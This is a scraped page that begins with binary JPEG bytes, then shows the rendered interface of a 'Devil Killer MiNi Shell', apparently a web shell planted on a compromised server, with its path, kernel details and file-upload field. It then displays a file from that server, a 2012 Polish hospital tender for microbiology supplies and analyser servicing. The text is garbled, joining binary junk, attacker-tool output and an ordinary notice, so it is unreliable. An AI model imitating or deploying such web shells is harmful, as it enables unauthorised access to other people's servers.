JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121026/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121026/227987-N-2012.html

<p class="kh_header"><b>Pruszków: dostawy  podłóż do hodowli drobnoustrojów, testów do identyfikacji bakterii, krążków do antybiogramów, pasków z gradientem stężeń, szybkich testów na wykrywanie toksyn Clostridium difficile w kale oraz  Rotawirusów  i  Adenowirusów, odczynnik do oznaczania glukozy, odczynników i części zużywalnych oraz serwis do aparatu AVL.</b><br>
<b>Numer ogłoszenia: 227987 - 2012; data zamieszczenia: 26.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Kolejowy im. dr med. Wł. Roeflera SP ZOZ , ul. Warsztatowa 1, 05-800 Pruszków, woj. mazowieckie, tel. 22 77 09 308, faks 22 77 09 308.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawy  podłóż do hodowli drobnoustrojów, testów do identyfikacji bakterii, krążków do antybiogramów, pasków z gradientem stężeń, szybkich testów na wykrywanie toksyn Clostridium difficile w kale oraz  Rotawirusów  i  Adenowirusów, odczynnik do oznaczania glukozy, odczynników i części zużywalnych oraz serwis do aparatu AVL..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dostawy  podłóż do hodowli drobnoustrojów, testów do identyfikacji bakterii, krążków do antybiogramów, pasków z gradientem stężeń, szybkich testów na wykrywanie toksyn Clostridium difficile w kale oraz  Rotawirusów i Adenowirusów, odczynnika do oznaczania glukozy, odczynników  i części zużywalnych oraz serwis do aparatu AVL.                                                                                                           Wykonawca będzie sukcesywnie dostarczał przedmiot zamówienia, zgodnie ze wskazaniami Zamawiającego według specyfikacji asortymentu określonego w tabeli asortymentowo-ilościowej stanowiącej załącznik nr 2 do SIWZ)umowy. W cenie oferty Wykonawca zobowiązany jest uwzględnić koszty dostawy przedmiotu zamówienia do siedziby Zamawiającego, w szczególności koszt transportu, opakowania, załadunku i rozładunku, koszty przeglądów technicznych aparatu AVL (robocizna i części zamienne) , cena za dojazd serwisu do Zamawiającego. Załącznik nr 2 do niniejszej SIWZ)Umowy zawiera przewidywalną maksymalną wielkość dostawy oraz usługi serwisowej , która jest wielkością szacunkową w skali 2 lat, w związku z czym Zamawiający zastrzega, iż nie każda pozycja w nim wyszczególniona może zostać zakupiona w pełnym zakresie ilościowym. Wykonawca określi telefony kontaktowe  i numery fax. oraz inne  ustalenia niezbędne dla sprawnego i terminowego zrealizowania zamówienia.  Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia. Dostarczane przez Wykonawcę w ramach przedmiotu zamówienia odczynniki laboratoryjne  muszą posiadać powiadomienie)zgłoszenie Urzędu  Rejestracji Produktów Leczniczych , Wyrobów Medycznych i Produktów Biobójczych w Warszawie zgodnie z ustawą o wyrobach medycznych z dnia 20 maja 2010r. 
pakiet I
Lp.	Nazwa	opakowanie wymagane	ilość szt. testów na 2 lata
				
1	Ampicillin	5 do 30		                            60
2	Cefotaxime	5 do 30		                            60
3	Ceftriaxone	5 do 30 		                            60
4	Colistin	5 do 30 		                            60
5	Penicillin	5 do 30		                            60
6	Teicoplanin	5 do 30		                            60
7	Vancomycin	5 do 30		                            60
8	Imipenem	5 do 30		                            30
9	Clindamycin	5 do 30		                            30
10	Metronidazol 5 do 30		                            30
pakiet II
Lp.	Nazwa	opakowanie wymagane		ilość na 2 lata
				
1	Szereg do identyfikacji pałeczek z rodziny Enterobakteriaceae ( 20 - 24 parametrów ) + książka kodów do 20-parametrowego szeregu
do identyfikacji Enterobakteriaceae ( szt.1 )                       
	od 10 do 50		200 ozn.
2	Szereg do identyfikacji Enterobakteriaceae (10 - 12 parametrów ) + książka kodów do 10-parametrowego szeregu do identyfikacji Enterobakteriaceae ( szt. 1 )
	od 20 do 100	1600 ozn.
3	Odczynniki do szeregu Enterobakteriaceae TDA , JAMES, VP1, VP2, NIT1, NIT2 w ilości potrzebnej do wykonania podanej ilości  10-parametrowych.			
4	Odczynniki do szeregu Enterobakteriaceae TDA , JAMES, VP1, VP2, NIT1, NIT2 w ilości potrzebnej do wykonania podanej ilości testów 20-parametrowych			
5	Szereg do identyfikacji Gram-ujemnych pałeczek niefermentujących ( 20 parametrów ) odczynniki do szeregu na pałeczki niefermentujące ( Zn, NIT1, NIT2,  JAMES ) w ilości potrzebnej do wykonania podanej liczby testów dla Gram-ujemnych pałeczek niefermentujących + książka kodów do szeregu na pałeczki niefermentujące ( szt. 1 )	od 10 do 25		200 ozn.
6	Szereg do i( VP1, VP2, ZYMA, ZYMB, NIN ) w ilości potrzebnej do wykonania podanej liczby testów dla Streptococci + książka kodów do szeregu na paciorkowce ( szt. 1 )	od 10 do 25		100 ozn
7	Szereg do identyfikacji Staphylococci ( 20 parametrów ) książka kodów do szeregu na gronkowce odczynniki do szeregu na gronkowce ( VP 1, VP 2, NIT 1, NIT 2, ZYM A, ZYM B ) w ilości potrzebnej do wykonania podanej liczby testów dla Staphylococci         	od 10 do 25		100 ozn.
8	Szereg do identyfikacji beztlenowców ( 20 parametrów ) + książka kodów do szeregu na beztlenowce, odczynniki do szeregu na beztlenowce (EHR, XYL,BCP ) w ilości potrzebnej do wykonania podanej liczby testów na beztlenowce	od 20 do 50		200ozn.
9	Szereg do identyfikacji Candida	od 10 do 20		100 ozn.
10	Szereg do identyfikacji Neisseria, Haemophilus	od 10 do 20		40 ozn.
11	Szybki test lateksowy do wykrywania Clumbing factor i białka A i bialek otoczkowych u Gronkowców 	od 200 do500		1600 ozn.
12	Plazma królicza	0,5 -5,0 mL		600mL 
13	Szybki test lateksowy do potwierdzania MRSA	od 20 do 100		200 ozn.
14	Generator do wytwarzania atmosfery do hodowli beztlenowców ( torebka + generator	od 5 do 20		600 szt.
15	Generator do wytwarzania atmosfery dla beztlenowców ( do pojemnika 2,5 L )	od 5 do 20		400 szt.
16	Paski wskaźnikowe do sprawdzania atmosfery beztlenowej	od 5 do 20		200 szt.
17	Test na Paciorkowce zestaw ( Strepto A, Strepto B, Strepto C, StreptoD, StreptoG, StreptoF )    	od 5 do 20 ozn		300 ozn.
18	Lateks do oznaczania St. Pneumoniae	od 10 do 50 ozn		100 ozn
19	Odczynnik ID indole TDA			200 ozn.
Pakiet III
Lp.	Nazwa	opakowanie wymagane 	ilość op.na 2 lata
				
1	Amikacin 30	50 krążków		20
2	Amoxycillin 10	50 krążków		12
3	AmoXycillin)Clavulan acid 2)1	50 krążków		20
4	Amoxycillin ) Clavulan acid 20 )10	50 krążków		120
5	Ampicillin 10	50 krążków		60
6	Ampicillin2	50 krążków		10
7	Ampicillin ) Sulbctam 10 )10	50 krążków		20
8	Aztreonam 30	50 krążków		10
9	Azithromycin15	50 krążków		10
10	Carbenicillin 100	50 krążków		20
11	Cefaclor 30	50 krążków		10
12	Cefaperazone 75 	50 krążków		10
13	Cefepim 30	50 krążków		10
14	Cefixime 5	50 krążków		10
15	Cefprozil 30	50 krążków		10
16	Cephazolin 30	50 krążków		10
17	Cefotaxime 30	50 krążków		20
18	Cefotaxime 5	50 krążków		60
19	Ceftazidime 30	50 krążków		20
20	Ceftazidime 10	50 krążków		80
21	Cefuroxime 30	50 krążków		80
22	Ceftriaxone 30	50 krążków		10
23	Cephalothin 30	50 krążków		20
24	Cephalexin 30	50 krążków		10
25	Cefoxicin 30	50 krążków		60
26	Cefpodoksym 10	50 krążków		10
27	Chloramphenicol 30  50 krążków	10
28	Ciprofloxacin 5	50 krążków		120
29	Clarithromycin 15	50 krążków		10
30	Clindamycin 2	50 krążków		40
31	Cotrimoxazole23,75 ) 1,25   50 krążków	100
32	Colistin sulphate 50  50 krążków		10
33	Fosfomycin)Trometamol 200	50 krążków		20
34	Doxycycline 30	50 krążków		6
35	Doripenem 10	50 krążków		10
36	Ertapenem 10	50 krążków		10
37	Erythromycin 15	50 krążków		40
38	Fusidic Acid 10	50 krążków		10
39	Gentamycin 10	50 krążków		100
40	Gentamycin 30	50 krążków		10
41	Imipenem 10	50 krążków		20
42	Lincomycin 15	50 krążków		4
43	Linezolid 30	        50 krążków	        5	
44	Lewofloxacin 5	50 krążków		10
45	Meropenem 10	50 krążków		30
46	Metronidazole 5	50 krążków		10
47	Moksyfloxcin 5	50 krążków		10
48	Mupirocin 200	50 krążków		10
49	Nalidixic Acid 30	50 krążków		4
50	Neomycin 30	50 krążków		4
51	Netilmicin 30	50 krążków		20
52	Nitrofurantoin 300	50 krążków		40
53	Norfloxacin 10	50 krążków		40
54	Novobiocin 5	50 krążków		10
55	Ofloxacin 5	        50 krążków		10
56	Oxacillin1	        50 krążków		10
57	Penicillin G 10j	50 krążków		20
58	Penicillin G 1j	50 krążków		10
59	Piperacillin 100	50 krążków		40
60	Piperacillin ) Tazobactam 100/10    50 krążków	 40
61	Rifampicin 5	       50 krążków		10
62	Streptomycin 300	50 krążków		10
63	Sulphamethoxazole 25	50 krążków	  4
64	Sinercid 15 ) Chirupristyna ) Dalfopristina	50 krążków	   10
65	Teicoplanin 30	50 krążków		40
66	Tetracycline 30	50 krążków		40
67	Ticarcillin 75	50 krążków		20
68	Ticarcillin ) Clavulac Acid 75)10	50 krążków	   40
69	Tobramycin 10	50 krążków		20
70	Trimethoprim5	50 krążków		10
71	Vancomycin 5	50 krążków		20
72	Vancomycin 30	50 krążków		20
73	Krążki czyste bez antybiotyku	 50 krążków	  1000 krążków
Pakiet IV
Lp.	Nazwa	opakowanie wymagane		ilość szt. testów na 2 lata
				
1	Ampicillin	5 do 30	                        60
2	Cefotaxime	5 do 30	                 	60
3	Ceftriaxone	5 do 30 	     	                60
4	Colistin	5 do 30 		                60
5	Penicillin	5 do 30		                60
6	Teicoplanin	5 do 30		                60
7	Vancomycin	5 do 30		                60
8	Imipenem	5 do 30		                30
9	Clindamycin	5 do 30		                30
10	Metronidazol  5 do 30		                30

pakiet V
Lp.	Nazwa	Wiekość op. wymagana		ilość testów na 2 lata
				
				
1	Toksyny Clostridium difficile A)B w kale	5 -50		700
				
2	Test do wykrywania Enzymu 	5 do 20		         80
	Clstridium difficile (test GDH)			
3	Szbki test lateksowy 	10 do 20		               200
	lub immunochrotograficzny			
	do wykrywania Rotawirusów 			
	i Adenowirusów	
pakiet VI
lp.	Nazwa	wielkość opakowania wymagana	ilość mL na 2 lata
				
				
1	Glukoza	500 - 1000	                               	35000
		
pakiet VII
Lp.	Nazwa	wielkość opakowania wymagana	Ilość op. na 2 lata
			
			
1.	Standard A Ca++	4x430 mL	                      25
2.	Standard B Ca++	3x90 mL	                      22
3.	ISE Reference	3x90 mL	                      20
4.	Płyn do kondycjonowania	100 mL	       5
	elektrody sodowej		
5.	Odbiałczacz	100 - 125 mL	                       5
6.	Elektroda sodowa	1 szt.	2 szt.
8.	Elektroda potasowa	1 szt.	                    2 szt.
10.	Elektroda wapniowa	1 szt.	                    2 szt.
12.	Elektroda referencyjna 	1	                    1 szt.
12.	Rurki do pompy perystaltycznej		2 zestawy
13.	Rozcieńczalnik do moczu    100 - 500 mL	   500 mL
14.	Sonda do pobierania	1 szt.	                    1 szt.

Wymagania: 

1.  Jakość poszczególnych serii podłoży bakteriologicznych (pakiet I) powinna być potwierdzona aktualnymi    
     wynikami kontroli jakości. Certyfikat tej kontroli musi być dołączony do każdej serii dostarczanego podłoża. 
     Wszystkie podłoża na płytkach muszą mieć gładką 
     powierzchnię pozbawioną jakichkolwiek nierówności. Podłoża w butelkach: butelki oraz zamknięcia butelek  
     powinny być wykonane z materiału umożliwiającego rozpuszczanie podłóż w mikrofalówce.
2.  Podłoża na płytkach, pakiet I powinny pochodzić od jednego producenta 
 3. Termin ważności przysyłanych podłóż i odczynników nie powinien być krótszy niż połowa całego terminu  
      ważności a terminy ważności krążków antybiotykowych i pasków z antybiotykami z  gradientem stężeń     
      minimum 1 rok.
 4. Test do jakościowego wykrywania toksyn Clostridium difficile w próbkach kału ludzkiego. Test   
      wykrywający  obecność toksyn A i B. Test immunochromatograficzny z wykorzystaniem przeciwciał     
      swoistych do toksyn A i B Clostridium difficile. Test paskowy lub kasetkowy z kontrolą umożliwiającą     
      stwierdzenie poprawności wykonania testu. Odczyt wyniku testu nie dłuższy niż do 15 minut. Obecność 
      rozcieńczalnika(buforu) w zestawie, jeśli jest konieczny. Czułość analityczna testu: test wykrywający 
      stężenie już od: dla toksyny A 1,5 ng/mL, toksyny B 5 ng/mL. Test GDH może być w zestawie  z testem na 
      toksyny. Test do wykrywania Rotawirusów i Adenowirusów immunochromatograficzny kasetkowy lub 
      paskowy. Czułość testu dla Rotawirusów i Adenowirusów > 96%, specyficzność >97%.
  5. Odczynnik do oznaczania glukozy: metoda OXY, kolorymetryczna, odczynnik płynny , gotowy do użycia,     
      wymagany czas inkubacji nie dłuższy niż 10 minut.
  6. Do pakietu VII: wymagane zapewnienie serwisu do aparatu AVL 988-3 na czas obowiązywania umowy.
  7. Wymagane instrukcje w języku polskim do odczynników i testów.
  8. Firmy, które wygrają przetarg dostarczą wydrukowane karty charakterystyki substancji   niebezpiecznych    
      zawartych w proponowanych odczynnikach.                                                                             
     Koszty kart  charakterystyki powinny być zawarte w ramach proponowanej ceny na produkty.
   9.Jeśli odczynniki proponowane zawierają substancje niebezpieczne (o których mowa w Ustawie o       
      opakowaniach i odpadach opakowaniowych z dn. 11 maja 2001, Dz. U. nr 63, poz.638), a więc substancje 
      bardzo toksyczne, toksyczne, rakotwórcze, mutagenne i/lub niebezpieczne dla środowiska, to zgodnie z 
      Ustawą użytkownik środków niebezpiecznych jest zobowiązany zwrócić sprzedawcy odpady opakowaniowe     
      po tych środkach, natomiast obowiązkiem sprzedawcy jest zorganizowanie utylizacji tych opakowań. W 
      związku z powyższym proszę o przysłanie w ofercie informacji o sposobie odbioru tych odpadów oraz 
      zapewnienia, że będzie to realizowane na koszt sprzedawcy, w ramach umowy.                                                                                                                     10. Odczynniki i artykuły powinny posiadać deklarację zgodności  CE ( jeśli jest wymagana).                                                                                11. Krążki do antybiogramów powinny być pakowane po 50 sztuk w hermetycznie i jałowo zamknięte        
      opakowanie ( typowe dla krążków ), każde ze środkiem osuszającym. Każdy krążek musi posiadać wyraźnie 
      nadrukowany stały, międzynarodowy skrót nazwy antybiotyku i stężenie, zgodnie z zaleceniami CLSI. 
      Wymagana średnica krążka 6 mm.
      Każda partia przysyłanych krążków z tym samym antybiotykiem powinna być tej samej serii, jednej serii..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających do 20 % zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych 
    art. 22 ust. 1 ustawy  Prawo zamówień publicznych. Formularz oświadczenia stanowi załącznik nr 4 do 
    SIWZ. 
2)Koncesja, zezwolenie lub licencja, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub     
    licencji na podjęcie działalności gospodarczej w zakresie objętym  niniejszym   zamówieniem publicznym. W 
    przypadku, gdy koncesja nie jest wymagana, należy złożyć stosowne   oświadczenie w tej kwestii.
Ocena spełniania warunku metodą spełnia/nie spełnia na podstawie złożonych dokumentów</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych 
    art. 22 ust. 1 ustawy  Prawo zamówień publicznych. Formularz oświadczenia stanowi załącznik nr 4 do 
    SIWZ. 
Ocena spełniania warunku metodą spełnia/nie spełnia na podstawie złożonych dokumentów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych 
    art. 22 ust. 1 ustawy  Prawo zamówień publicznych. Formularz oświadczenia stanowi załącznik nr 4 do 
    SIWZ. 
Ocena spełniania warunku metodą spełnia/nie spełnia na podstawie złożonych dokumentów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych 
    art. 22 ust. 1 ustawy  Prawo zamówień publicznych. Formularz oświadczenia stanowi załącznik nr 4 do 
    SIWZ. 
Ocena spełniania warunku metodą spełnia/nie spełnia na podstawie złożonych dokumentów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych 
    art. 22 ust. 1 ustawy  Prawo zamówień publicznych. Formularz oświadczenia stanowi załącznik nr 4 do 
    SIWZ. 
Ocena spełniania warunku metodą spełnia/nie spełnia na podstawie złożonych dokumentów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Powiadomienie/zgłoszenie Urzędu  Rejestracji Produktów Leczniczych , Wyrobów Medycznych i Produktów         Biobójczych z ustawą o wyrobach medycznych z dnia 20 maja 2010r. 
2. Deklaracja zgodności CE producenta dla oferowanych produktów 
3. Oświadczenie o dostarczeniu  po wygraniu przetargu kart charakterystyki   substancji niebezpiecznych     
    zawartych w odczynnikach,  jeśli takie zawierają oraz pozwolenie na obrót produktem biobójczym -     
    załącznik nr 5    
 4.Oświadczenie Wykonawcy, że podłoża na płytkach, w pakiecie I pochodzą  od jednego producenta -     
     załącznik  nr  6 ( złożyć w przypadku oferty na I pakiet).
